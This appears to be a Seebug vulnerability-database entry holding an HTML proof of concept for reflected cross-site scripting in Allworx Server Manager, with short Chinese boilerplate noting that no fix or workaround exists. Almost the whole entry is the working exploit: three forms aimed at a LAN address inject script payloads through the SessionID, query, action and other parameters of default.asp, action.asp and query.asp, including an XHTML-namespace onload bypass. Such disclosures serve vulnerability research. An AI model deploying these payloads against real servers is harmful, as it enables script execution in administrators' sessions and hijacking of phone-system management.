<html> <head> <title>Allworx Server Manager Multiple Cross-Site Scripting Vulnerabilities</title> </head> <body> <script>history.pushState('', '', '/')</script> <br />::: default.asp :::<br /> ∇ <form action="http://192.168.2.254/default.asp"> <input type="hidden" name="Tab" value='MyConferences"><script>confirm(0)</script>' /> <input type="hidden" name="SessionID" value='0000"><script>confirm(1)</script>' /> <input type="hidden" name="Op" value="ModConf" /> <input type="hidden" name="key" value='2"><script>confirm(2)</script>' /> <input type="submit" value="Submit request 1" /> </form> <br />::: action.asp :::<br /> ∇ <form action="http://192.168.2.254/action.asp"> <input type="hidden" name="action" value='selectActivePresence"><script>confirm(3)</script>' /> <input type="hidden" name="SessionID" value="zsl" /> <input type="hidden" name="LoginName" value="admin" /> <input type="hidden" name="Presence" value="0" /> <input type="hidden" name="AnnounceOnlyIndices" value="" /> <input type="submit" value="Submit request 2" /> </form> <br />::: query.asp :::<br /> ∇ <form action="http://192.168.2.254/query.asp"> <input type="hidden" name="query" value="RepQuery<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='confirm(4)'/></a>" /> <input type="hidden" name="SessionID" value="251<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='confirm(5)'/></a>" /> <input type="hidden" name="repName" value="SystemSettings" /> <input type="hidden" name="fields" value="sysProfileName,hostLanTcpIpAddress,hostWanTcpIpAddress" /> <input type="hidden" name="groupName" value="records<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='confirm(6)'/></a>" /> <input type="hidden" name="recName" value="record<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='confirm(7)'/></a>" /> <input type="hidden" name="rnd" value="20435" /> <input type="submit" value="Submit request 3" /> </form> </body> </html>
暂无临时解决方案
暂无官方解决方案
暂无防护方案
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论